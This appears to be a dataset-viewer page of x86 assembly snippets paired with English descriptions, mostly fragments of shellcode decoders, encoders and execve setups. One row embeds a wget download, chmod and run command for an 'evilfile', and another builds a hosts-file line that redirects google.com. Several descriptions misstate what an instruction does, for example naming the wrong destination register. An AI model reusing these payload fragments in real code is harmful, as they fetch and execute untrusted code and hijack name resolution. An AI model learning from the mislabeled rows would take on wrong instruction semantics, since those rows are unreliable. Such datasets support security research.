SNIPPETS stringlengths 2 1.64k | INTENTS stringlengths 4 1.66k |
|---|---|
lea ecx, [eax] | load the effective address of the result of the operation [eax] into the ecx register |
lea ecx, [ebp+28] | load the effective address [ebp+28] into ecx |
lea ecx, [ebp+28] | load the effective address of the result of the operation [ebp+28] into the ecx register |
lea ecx, [ebx+0xff] | load the value of ebx+0xff into register ecx |
lea ecx, [ebx+8] | load the effective address of ebx+8 into ecx |
lea ecx, [esi + 8] | load the adress esi+8 into ecx register |
lea ecx, [esi + 8] | load the effective address of the result of the operation [esi + 8] into the ecx register |
lea ecx, [esi] | point ecx to the start of the shellcode |
lea ecx, [esi+1] | point ecx to the next byte of the shellcode |
lea ecx, [esi+18] | load the effective address [esi+18] into ecx |
lea ecx, [esi+18] | load the effective address of the result of the operation [esi+18] into the ecx register |
lea ecx, [esi+22] | load the effective address of the result of the operation [esi+22] into the ecx register |
lea ecx, [esi+35] | load address of ptr to argv[] array into ecx register |
lea ecx, [esi+35] | load the effective address of the result of the operation [esi+35] into the ecx register |
lea ecx, [esi+8] | load the effective address of the result of the operation [esi+8] into the ecx register |
lea ecx, [esp] | load stack pointer to ebx |
lea ecx, [esp] | load esp address into ecx register |
lea ecx, [esp] | load the effective address of esp into the ecx register |
lea ecx, [zero_reg+117] | load the effective address [zero_reg+117] into ecx |
lea ecx, [zero_reg+117] | load the effective address of the result of the operation [zero_reg+117] into the ecx register |
lea ecx, [zero_reg+3] | load the effective address [zero_reg+3] into ecx |
lea ecx, [zero_reg+3] | load the effective address of the result of the operation [zero_reg+3] into the ecx register |
lea ecx,[esi+0xc] | load the address esi+0xc into ecx register |
lea edi, [ebx] | load the effective address [ebx] into edi |
lea edi, [ebx] | load the effective address of ebx into the edi register |
lea edi, [ebx+4*esi] | place the value ebx+4*esi in edi |
lea edi, [ebx+4*esi] | place the quantity ebx+4*esi in edi |
lea edi, [edi + 2] | load the address of edi+2 into edi |
lea edi, [edi +8] | make edi point to rot_value |
lea edi, [esi + 13] | put the byte in the address esi+13 in edi regsiter. |
lea edi, [esi + 13] | load the effective address of the result of the operation [esi + 13] into the edi register |
lea edi, [esi + 13] | load the address at esi + 13 into edi |
lea edi, [esi +1] | transfer the second character pointed from esi to edi |
lea edi, [esi +1] | load the effective address of [esi + 1] into the edi register |
lea edi, [esi] | copy the address of esi in edi |
lea edi, [esi] | load the effective address [esi] into edi |
lea edi, [esi] | load the address of esi into edi |
lea edi, [esi] | point edi to the start of the shellcode |
lea edi, [esi] | load the contents of esi into edi |
lea edi, [esi+0x1] | load the address of esi+0x1 into edi |
lea edi, [esi+1] | point edi to the next byte of the shellcode |
lea edi, [esi+13] | load the effective address of esi+13 into esi+13 |
lea edi,[esi] | copy the address of esi into edi register |
lea edi,[esi+0x1] | copy the adress a tesi+0x1 into edi register |
lea edx, [ebx+12] | load the effective address of ebx+12 into edx |
lea edx, [esi + 12] | load the adress esi+12 into edx register |
lea edx, [esi + 12] | load the effective address of the result of the operation [esi + 12] into the edx register |
lea edx, [esi] | point edx to the start of the shellcode |
lea edx, [esi+1] | point edx to the next byte of the shellcode |
lea edx, [esi+26] | load the effective address [esi+26] into edx |
lea edx, [esi+26] | load the effective address of the result of the operation [esi+26] into the edx register |
lea edx, [esi+30] | load the effective address of the result of the operation [esi+30] into the edx register |
lea edx, [esi+47] | load address of ptr to envp[] null into edx register |
lea edx, [esi+47] | load the effective address of the result of the operation [esi+47] into the edx register |
lea edx,[esi+0x10] | load the address esi+0x10 into edx register |
lea esi, [ebp+20] | load the effective address [ebp+20] into esi |
lea esi, [ebp+20] | load the effective address of the result of the operation [ebp+20] into the esi register |
lea esi, [edi + 8] | transfer the eighth character pointed by edi to esi |
lea esi, [edi +16] | make esi register point to shellcode |
lea esi, [edi +8] | make esi point to shellcode that contains previous xorÕed results |
lea esi, [esi +4] | load the effective address of the result of the operation [esi +4] into the esi register |
lea esi, [esi+2] | load the effective address of esi+2 into esi |
lea esi, [esi+4] | load the effective address [esi+4] into esi |
lea esp, [ebx] | load the value of register ebx into register esp |
lea rdi, [rsp] | load the address of the string that is on the stack into rsi |
len equ $ - msg | define len equal to the length of msg |
len equ $-encodedshellcode | define len equal to the lenght of the encodedshellcode array |
len: equ $-encodedshellcode | variable for the lenght of the encoded shellcode |
len: equ $-google | define len = size of db "127.1.1.1 google.com" |
len: equ $-google | declare the len label equal to the size of the google variable |
len: equ $-shellcode | define lenght of shellcode, len |
len: equ $-shellcode | declare the len label equal to the length of shellcode |
les esp,fword ptr [ebx] | loads 32-bit pointer from ebx to esp and fs regster |
letter_c db 'c' | allocate a single byte of memory and initialize it to the letter 'c' |
line db '/usr/bin/wget http://127.0.0.1:8080/evilfile && /bin/chmod 777 evilfile && ./evilfile', 0x0a | define line as the byte string '/usr/bin/wget http://127.0.0.1:8080/evilfile && /bin/chmod 777 evilfile && ./evilfile', 0x0a |
line db "/usr/bin/wget http://127.0.0.1:8080/evilfile && /bin/chmod 777 evilfile && ./evilfile", 0x0a | jump to the _exec label after entering the address of the string ""/usr/bin/wget http://127.0.0.1:8080/evilfile && /bin/chmod 777 evilfile && ./evilfile", 0x0a" at the top of the stack |
loader: | define _loader |
loader: | declare the loader label |
lods al,byte ptr ds:[esi] | transfers string element addressed by esi regoster into al register |
loop .3 | decrement the counter and jump to .3 label if the count is not zero |
loop 3 | decrement ecx and jumps to the 3 label unless decrementing ecx caused its value to become zero |
loop bucle | decrement the ecx register and jump to the bucle label if the counter is not zero |
loop check_even_odd | loop check_even_odd using ecx for counter |
loop check_even_odd | decrement the count register and jump to check_even_odd if the count is not equal to zero |
loop check_even_odd \n jmp short shellcode | decrease the counter and jump to check_even_odd if not zero else jump short to shellcode |
loop check_even_odd \n jmp short shellcode | decrement the ecx register and jump to the check_even_odd label if the contents of the ecx register is not zero else jump short to the shellcode label |
loop decode | loop decode |
loop decode | start loop decode |
loop decode | loop deocde |
loop decode | loop while zero flag not set |
loop decode | decode current byte |
loop decode | decrement ecx and jumps to the decode label unless decrementing ecx caused its value to become zero |
loop decode | decrement the count register and jump to decode if not equal zero |
loop decode | decrease the counter and jump to decode if not zero |
loop decode \n jmp edx | decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump to the edx register |
loop decode \n jmp edx | decrement the counter and jump to decode if not zero else jump to edx |
loop decode \n jmp EncodedShellcode | decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump to the EncodedShellcode label |
loop decode \n jmp encodedshellcode | decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump short to the encodedshellcode label |
loop decode \n jmp Shellcode | decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump to the Shellcode label |
loop decode \n jmp shellcode | decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump short to the shellcode label |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.